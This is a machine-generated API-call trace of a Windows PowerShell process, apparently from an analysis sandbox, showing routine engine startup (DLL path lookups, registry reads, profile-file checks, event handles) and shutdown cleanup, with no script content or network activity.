	[0042.388] GetLastError () returned 0xcb
	[0042.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0042.388] GetLastError () returned 0xcb
	[0042.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0042.388] GetLastError () returned 0xcb
	[0042.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0042.388] GetLastError () returned 0xcb
	[0042.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0042.388] GetLastError () returned 0xcb
	[0042.414] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.415] VirtualQuery (in: lpAddress=0x25cfa0, lpBuffer=0x25dfa0, dwLength=0x1c | out: lpBuffer=0x25dfa0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.415] VirtualQuery (in: lpAddress=0x25cc54, lpBuffer=0x25dc54, dwLength=0x1c | out: lpBuffer=0x25dc54*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.415] VirtualQuery (in: lpAddress=0x25cc54, lpBuffer=0x25dc54, dwLength=0x1c | out: lpBuffer=0x25dc54*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.416] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e6dc | out: phkResult=0x25e6dc*=0x37c) returned 0x0
	[0042.416] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e724, lpData=0x0, lpcbData=0x25e720*=0x0 | out: lpType=0x25e724*=0x1, lpData=0x0, lpcbData=0x25e720*=0x56) returned 0x0
	[0042.416] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e724, lpData=0x190b58, lpcbData=0x25e720*=0x56 | out: lpType=0x25e724*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e720*=0x56) returned 0x0
	[0042.416] RegCloseKey (hKey=0x37c) returned 0x0
	[0042.417] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e6dc | out: phkResult=0x25e6dc*=0x37c) returned 0x0
	[0042.417] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e724, lpData=0x0, lpcbData=0x25e720*=0x0 | out: lpType=0x25e724*=0x1, lpData=0x0, lpcbData=0x25e720*=0x56) returned 0x0
	[0042.417] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e724, lpData=0x190b58, lpcbData=0x25e720*=0x56 | out: lpType=0x25e724*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e720*=0x56) returned 0x0
	[0042.417] RegCloseKey (hKey=0x37c) returned 0x0
	[0042.419] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x190b58 | out: pszPath="C:\\Users\\2XC7u663GxWc\\Documents") returned 0x0
	[0042.419] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x190b58 | out: pszPath="C:\\Users\\2XC7u663GxWc\\Documents") returned 0x0
	[0042.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x25e30c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0042.421] GetLastError () returned 0x3f0
	[0042.421] SetErrorMode (uMode=0x1) returned 0x1
	[0042.421] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x25e78c | out: lpFileInformation=0x25e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0042.421] GetLastError () returned 0x2
	[0042.421] SetErrorMode (uMode=0x1) returned 0x1
	[0042.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x25e30c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0042.421] GetLastError () returned 0x2
	[0042.421] SetErrorMode (uMode=0x1) returned 0x1
	[0042.421] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x25e78c | out: lpFileInformation=0x25e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0042.421] GetLastError () returned 0x2
	[0042.421] SetErrorMode (uMode=0x1) returned 0x1
	[0042.422] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x25e30c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x3d
	[0042.422] GetLastError () returned 0x2
	[0042.422] SetErrorMode (uMode=0x1) returned 0x1
	[0042.422] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\2xc7u663gxwc\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x25e78c | out: lpFileInformation=0x25e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0042.422] GetLastError () returned 0x3
	[0042.422] SetErrorMode (uMode=0x1) returned 0x1
	[0042.422] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x25e30c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x52
	[0042.422] GetLastError () returned 0x3
	[0042.422] SetErrorMode (uMode=0x1) returned 0x1
	[0042.422] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\2xc7u663gxwc\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x25e78c | out: lpFileInformation=0x25e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0042.423] GetLastError () returned 0x3
	[0042.423] SetErrorMode (uMode=0x1) returned 0x1
	[0042.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.424] GetLastError () returned 0xcb
	[0042.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.426] GetLastError () returned 0xcb
	[0042.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.428] GetLastError () returned 0xcb
	[0042.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.429] GetLastError () returned 0xcb
	[0042.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.430] GetLastError () returned 0xcb
	[0042.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.438] GetLastError () returned 0xcb
	[0042.438] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x37c
	[0042.438] GetLastError () returned 0x0
	[0042.438] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x380
	[0042.438] GetLastError () returned 0x0
	[0042.439] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x384
	[0042.439] GetLastError () returned 0x0
	[0042.439] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0042.439] GetLastError () returned 0x0
	[0042.439] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x38c
	[0042.439] GetLastError () returned 0x0
	[0042.439] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a8
	[0042.439] GetLastError () returned 0x0
	[0042.439] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x374
	[0042.439] GetLastError () returned 0x0
	[0042.439] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394
	[0042.439] GetLastError () returned 0x0
	[0042.439] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0042.439] GetLastError () returned 0x0
	[0042.439] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x300
	[0042.439] GetLastError () returned 0x0
	[0042.439] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0042.439] GetLastError () returned 0x0
	[0042.440] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0042.440] GetLastError () returned 0x0
	[0042.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.441] GetLastError () returned 0xcb
	[0042.445] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0042.445] GetLastError () returned 0xcb
	[0042.446] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x25e7cc | out: lpMode=0x25e7cc) returned 1
	[0042.446] GetLastError () returned 0xcb
	[0042.447] SetEvent (hEvent=0x388) returned 1
	[0042.447] GetLastError () returned 0xcb
	[0042.447] SetEvent (hEvent=0x37c) returned 1
	[0042.447] GetLastError () returned 0xcb
	[0042.448] SetEvent (hEvent=0x380) returned 1
	[0042.448] GetLastError () returned 0xcb
	[0042.448] SetEvent (hEvent=0x384) returned 1
	[0042.448] GetLastError () returned 0xcb
	[0042.448] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0042.448] GetLastError () returned 0x0
	[0042.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.449] GetLastError () returned 0xcb
	[0042.450] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e630 | out: phkResult=0x25e630*=0x338) returned 0x0
	[0042.450] RegQueryValueExW (in: hKey=0x338, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x25e678, lpData=0x0, lpcbData=0x25e674*=0x0 | out: lpType=0x25e678*=0x0, lpData=0x0, lpcbData=0x25e674*=0x0) returned 0x2
	[0044.032] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x364
	[0044.032] GetLastError () returned 0x0
	[0044.032] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x368
	[0044.032] GetLastError () returned 0x0
	[0044.032] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c
	[0044.032] GetLastError () returned 0x0
	[0044.032] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x370
	[0044.032] GetLastError () returned 0x0
	[0044.033] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x390
	[0044.033] GetLastError () returned 0x0
	[0044.033] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3b0
	[0044.033] GetLastError () returned 0x0
	[0044.033] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4
	[0044.033] GetLastError () returned 0x0
	[0044.033] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b8
	[0044.033] GetLastError () returned 0x0
	[0044.033] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3bc
	[0044.033] GetLastError () returned 0x0
	[0044.033] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3c0
	[0044.033] GetLastError () returned 0x0
	[0044.033] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c4
	[0044.033] GetLastError () returned 0x0
	[0044.033] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c8
	[0044.033] GetLastError () returned 0x0
	[0044.033] SetEvent (hEvent=0x370) returned 1
	[0044.033] GetLastError () returned 0x0
	[0044.033] SetEvent (hEvent=0x364) returned 1
	[0044.034] GetLastError () returned 0x0
	[0044.034] SetEvent (hEvent=0x368) returned 1
	[0044.034] GetLastError () returned 0x0
	[0044.034] SetEvent (hEvent=0x36c) returned 1
	[0044.034] GetLastError () returned 0x0
	[0044.034] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3cc
	[0044.034] GetLastError () returned 0x0
	[0044.034] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e664 | out: phkResult=0x25e664*=0x3d0) returned 0x0
	[0044.034] RegQueryValueExW (in: hKey=0x3d0, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x25e6ac, lpData=0x0, lpcbData=0x25e6a8*=0x0 | out: lpType=0x25e6ac*=0x0, lpData=0x0, lpcbData=0x25e6a8*=0x0) returned 0x2
	[0044.127] SetEvent (hEvent=0x390) returned 1
	[0044.128] GetLastError () returned 0x0
	[0044.128] SetEvent (hEvent=0x3b0) returned 1
	[0044.128] GetLastError () returned 0x0
	[0044.128] SetEvent (hEvent=0x3b4) returned 1
	[0044.128] GetLastError () returned 0x0
	[0044.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0044.135] GetLastError () returned 0xcb
	[0044.139] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x191318, nSize=0x25e740 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x25e740) returned 0x1
	[0044.139] GetLastError () returned 0xcb
	[0044.139] GetUserNameW (in: lpBuffer=0x190b58, pcbBuffer=0x25e748 | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x25e748) returned 1
	[0044.141] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x228a198*="Stopped", lpRawData=0x228a054) returned 1
	[0044.182] GetLastError () returned 0x0
	[0044.183] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1
	[0044.183] GetLastError () returned 0x0
	[0044.184] CoGetContextToken (in: pToken=0x25f470 | out: pToken=0x25f470) returned 0x0
	[0044.184] CObjectContext::QueryInterface () returned 0x0
	[0044.184] CObjectContext::GetCurrentThreadType () returned 0x0
	[0044.184] Release () returned 0x0
	[0044.186] CoGetContextToken (in: pToken=0x25f248 | out: pToken=0x25f248) returned 0x0
	[0044.186] CObjectContext::QueryInterface () returned 0x0
	[0044.186] CObjectContext::GetCurrentThreadType () returned 0x0
	[0044.186] Release () returned 0x0
	[0044.188] CoGetContextToken (in: pToken=0x25f248 | out: pToken=0x25f248) returned 0x0
	[0044.188] CObjectContext::QueryInterface () returned 0x0
	[0044.188] CObjectContext::GetCurrentThreadType () returned 0x0
	[0044.188] Release () returned 0x0
	[0044.194] CoGetContextToken (in: pToken=0x25f248 | out: pToken=0x25f248) returned 0x0
	[0044.194] CObjectContext::QueryInterface () returned 0x0
	[0044.194] CObjectContext::GetCurrentThreadType () returned 0x0
	[0044.194] Release () returned 0x0
	[0044.246] CoGetContextToken (in: pToken=0x25f228 | out: pToken=0x25f228) returned 0x0
	[0044.246] CObjectContext::QueryInterface () returned 0x0
	[0044.246] CObjectContext::GetCurrentThreadType () returned 0x0
	[0044.246] Release () returned 0x0
	[0044.248] CoUninitialize () 

Thread:
	id = 16
	os_tid = 0xde0


Thread:
	id = 17
	os_tid = 0xde4


Thread:
	id = 18
	os_tid = 0xde8


Thread:
	id = 19
	os_tid = 0xdec


Thread:
	id = 20
	os_tid = 0xdf0

	[0029.607] CoGetContextToken (in: pToken=0x1d0f9a8 | out: pToken=0x1d0f9a8) returned 0x0
	[0029.607] CObjectContext::QueryInterface () returned 0x0
	[0029.607] CObjectContext::GetCurrentThreadType () returned 0x0
	[0029.607] Release () returned 0x0
	[0029.607] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0039.531] LocalFree (hMem=0x1804e0) returned 0x0
	[0039.532] GetLastError () returned 0x0
	[0039.532] CloseHandle (hObject=0x324) returned 1
	[0039.532] GetLastError () returned 0x0
	[0039.532] CloseHandle (hObject=0x13) returned 1
	[0039.532] GetLastError () returned 0x0
	[0039.532] CloseHandle (hObject=0xf) returned 1
	[0039.533] GetLastError () returned 0x0
	[0039.533] RegCloseKey (hKey=0x308) returned 0x0
	[0039.533] RegCloseKey (hKey=0x304) returned 0x0
	[0039.533] RegCloseKey (hKey=0x300) returned 0x0
	[0039.533] LocalFree (hMem=0x180500) returned 0x0
	[0039.533] GetLastError () returned 0x0
	[0039.533] RegCloseKey (hKey=0x330) returned 0x0
	[0041.110] RegCloseKey (hKey=0x370) returned 0x0
	[0041.110] RegCloseKey (hKey=0x36c) returned 0x0
	[0041.111] RegCloseKey (hKey=0x368) returned 0x0
	[0041.111] RegCloseKey (hKey=0x364) returned 0x0
	[0041.111] RegCloseKey (hKey=0x360) returned 0x0
	[0041.111] RegCloseKey (hKey=0x35c) returned 0x0
	[0041.111] RegCloseKey (hKey=0x358) returned 0x0
	[0041.111] RegCloseKey (hKey=0x3a0) returned 0x0
	[0041.112] RegCloseKey (hKey=0x39c) returned 0x0
	[0041.112] RegCloseKey (hKey=0x348) returned 0x0
	[0041.112] RegCloseKey (hKey=0x344) returned 0x0
	[0041.112] RegCloseKey (hKey=0x340) returned 0x0
	[0041.113] RegCloseKey (hKey=0x33c) returned 0x0
	[0041.113] RegCloseKey (hKey=0x338) returned 0x0
	[0041.113] RegCloseKey (hKey=0x334) returned 0x0
	[0041.113] RegCloseKey (hKey=0x324) returned 0x0
	[0041.113] RegCloseKey (hKey=0x304) returned 0x0
	[0041.113] RegCloseKey (hKey=0x300) returned 0x0
	[0041.114] RegCloseKey (hKey=0x398) returned 0x0
	[0041.114] RegCloseKey (hKey=0x394) returned 0x0
	[0041.114] RegCloseKey (hKey=0x374) returned 0x0
	[0041.114] RegCloseKey (hKey=0x3a8) returned 0x0
	[0041.115] RegCloseKey (hKey=0x38c) returned 0x0
	[0041.115] RegCloseKey (hKey=0x388) returned 0x0
	[0041.115] RegCloseKey (hKey=0x384) returned 0x0
	[0041.115] RegCloseKey (hKey=0x380) returned 0x0
	[0041.116] RegCloseKey (hKey=0x37c) returned 0x0
	[0041.116] RegCloseKey (hKey=0x378) returned 0x0
	[0041.116] RegCloseKey (hKey=0x354) returned 0x0
	[0041.116] RegCloseKey (hKey=0x3a4) returned 0x0
	[0041.116] RegCloseKey (hKey=0x330) returned 0x0
	[0042.713] RegCloseKey (hKey=0x338) returned 0x0
	[0044.187] GetLastError () returned 0x0
	[0044.187] GetLastError () returned 0x0
	[0044.187] LocalFree (hMem=0x16dbc8) returned 0x0
	[0044.187] GetLastError () returned 0x0
	[0044.188] GetLastError () returned 0x0
	[0044.188] GetLastError () returned 0x0
	[0044.188] LocalFree (hMem=0x16db40) returned 0x0
	[0044.188] GetLastError () returned 0x0
	[0044.193] DeregisterEventSource (hEventLog=0x4350004) returned 1
	[0044.194] GetLastError () returned 0x0
	[0044.218] CloseHandle (hObject=0x3c4) returned 1
	[0044.218] GetLastError () returned 0x0
	[0044.219] CloseHandle (hObject=0x3c0) returned 1
	[0044.219] GetLastError () returned 0x0
	[0044.219] CloseHandle (hObject=0x3bc) returned 1
	[0044.219] GetLastError () returned 0x0
	[0044.219] CloseHandle (hObject=0x3b8) returned 1
	[0044.219] GetLastError () returned 0x0
	[0044.219] CloseHandle (hObject=0x3b4) returned 1
	[0044.219] GetLastError () returned 0x0
	[0044.219] CloseHandle (hObject=0x3b0) returned 1
	[0044.219] GetLastError () returned 0x0
	[0044.219] CloseHandle (hObject=0x390) returned 1
	[0044.219] GetLastError () returned 0x0
	[0044.220] CloseHandle (hObject=0x370) returned 1
	[0044.220] GetLastError () returned 0x0
	[0044.220] CloseHandle (hObject=0x36c) returned 1
	[0044.220] GetLastError () returned 0x0
	[0044.220] CloseHandle (hObject=0x368) returned 1
	[0044.220] GetLastError () returned 0x0
	[0044.220] CloseHandle (hObject=0x364) returned 1
	[0044.220] GetLastError () returned 0x0
	[0044.220] CloseHandle (hObject=0xf) returned 1
	[0044.221] GetLastError () returned 0x0
	[0044.221] CloseHandle (hObject=0x7f) returned 1
	[0044.221] GetLastError () returned 0x0
	[0044.222] CloseHandle (hObject=0x7b) returned 1
	[0044.222] GetLastError () returned 0x0
	[0044.222] CloseHandle (hObject=0x77) returned 1
	[0044.222] GetLastError () returned 0x0
	[0044.223] CloseHandle (hObject=0x73) returned 1
	[0044.223] GetLastError () returned 0x0
	[0044.223] CloseHandle (hObject=0x6f) returned 1
	[0044.224] GetLastError () returned 0x0
	[0044.224] CloseHandle (hObject=0x6b) returned 1
	[0044.224] GetLastError () returned 0x0
	[0044.224] CloseHandle (hObject=0x67) returned 1
	[0044.225] GetLastError () returned 0x0
	[0044.225] CloseHandle (hObject=0x63) returned 1
	[0044.225] GetLastError () returned 0x0
	[0044.225] CloseHandle (hObject=0x5f) returned 1
	[0044.226] GetLastError () returned 0x0
	[0044.226] CloseHandle (hObject=0x5b) returned 1
	[0044.226] GetLastError () returned 0x0
	[0044.226] CloseHandle (hObject=0x57) returned 1
	[0044.227] GetLastError () returned 0x0
	[0044.227] CloseHandle (hObject=0x53) returned 1
	[0044.227] GetLastError () returned 0x0
	[0044.227] CloseHandle (hObject=0x4f) returned 1
	[0044.228] GetLastError () returned 0x0
	[0044.228] CloseHandle (hObject=0x4b) returned 1
	[0044.228] GetLastError () returned 0x0
	[0044.228] CloseHandle (hObject=0x47) returned 1
	[0044.229] GetLastError () returned 0x0
	[0044.229] CloseHandle (hObject=0x334) returned 1
	[0044.229] GetLastError () returned 0x0
	[0044.229] CloseHandle (hObject=0x324) returned 1
	[0044.229] GetLastError () returned 0x0
	[0044.229] CloseHandle (hObject=0x304) returned 1
	[0044.229] GetLastError () returned 0x0
	[0044.230] CloseHandle (hObject=0x300) returned 1
	[0044.230] GetLastError () returned 0x0
	[0044.230] CloseHandle (hObject=0x398) returned 1
	[0044.230] GetLastError () returned 0x0
	[0044.230] CloseHandle (hObject=0x394) returned 1
	[0044.230] GetLastError () returned 0x0
	[0044.230] CloseHandle (hObject=0x374) returned 1
	[0044.230] GetLastError () returned 0x0
	[0044.230] CloseHandle (hObject=0x3a8) returned 1
	[0044.230] GetLastError () returned 0x0
	[0044.231] CloseHandle (hObject=0x38c) returned 1
	[0044.231] GetLastError () returned 0x0
	[0044.231] CloseHandle (hObject=0x388) returned 1
	[0044.231] GetLastError () returned 0x0
	[0044.231] CloseHandle (hObject=0x384) returned 1
	[0044.231] GetLastError () returned 0x0
	[0044.231] CloseHandle (hObject=0x380) returned 1
	[0044.231] GetLastError () returned 0x0
	[0044.232] CloseHandle (hObject=0x37c) returned 1
	[0044.232] GetLastError () returned 0x0
	[0044.232] CloseHandle (hObject=0x43) returned 1
	[0044.232] GetLastError () returned 0x0
	[0044.232] CloseHandle (hObject=0x3f) returned 1
	[0044.233] GetLastError () returned 0x0
	[0044.233] CloseHandle (hObject=0x3b) returned 1
	[0044.233] GetLastError () returned 0x0
	[0044.233] CloseHandle (hObject=0x37) returned 1
	[0044.233] GetLastError () returned 0x0
	[0044.234] CloseHandle (hObject=0x33) returned 1
	[0044.234] GetLastError () returned 0x0
	[0044.234] CloseHandle (hObject=0x2f) returned 1
	[0044.234] GetLastError () returned 0x0
	[0044.234] CloseHandle (hObject=0x2b) returned 1
	[0044.235] GetLastError () returned 0x0
	[0044.235] CloseHandle (hObject=0x27) returned 1
	[0044.235] GetLastError () returned 0x0
	[0044.235] CloseHandle (hObject=0x23) returned 1
	[0044.235] GetLastError () returned 0x0
	[0044.236] CloseHandle (hObject=0x1f) returned 1
	[0044.236] GetLastError () returned 0x0
	[0044.236] CloseHandle (hObject=0x1b) returned 1
	[0044.236] GetLastError () returned 0x0
	[0044.236] CloseHandle (hObject=0x17) returned 1
	[0044.237] GetLastError () returned 0x0
	[0044.237] CloseHandle (hObject=0x13) returned 1
	[0044.238] GetLastError () returned 0x0
	[0044.238] CloseHandle (hObject=0x32c) returned 1
	[0044.238] GetLastError () returned 0x0
	[0044.238] RegCloseKey (hKey=0x3d0) returned 0x0
	[0044.239] RegCloseKey (hKey=0x80000004) returned 0x0
	[0044.239] CloseHandle (hObject=0x3cc) returned 1
	[0044.239] GetLastError () returned 0x0
	[0044.239] CloseHandle (hObject=0x2e8) returned 1
